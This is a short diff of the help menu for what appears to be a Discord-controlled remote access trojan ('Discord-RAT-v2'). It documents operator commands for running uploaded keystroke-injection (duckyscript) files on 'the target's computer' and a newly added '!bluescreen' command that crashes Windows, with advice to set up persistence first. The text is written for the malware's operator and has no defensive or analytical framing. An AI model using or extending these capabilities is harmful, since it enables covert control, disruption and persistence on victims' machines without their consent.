simen64/Discord-RAT-v2/help_menu.md

 !keyboard duckyscript = Upload a duckyscript file that will get executed on the targets computer.
 Note that this only supports very simple duckyscript syntax like: REM, STRING, STRINGLN, DELAY, and hotkeys

+## Windows commands:

+### Standalone commands:

+!bluescreen = Throws a bluescreen on the system.
+Make sure you have set up persistence before running this.

 ## Linux commands:

 ### Sudo commands: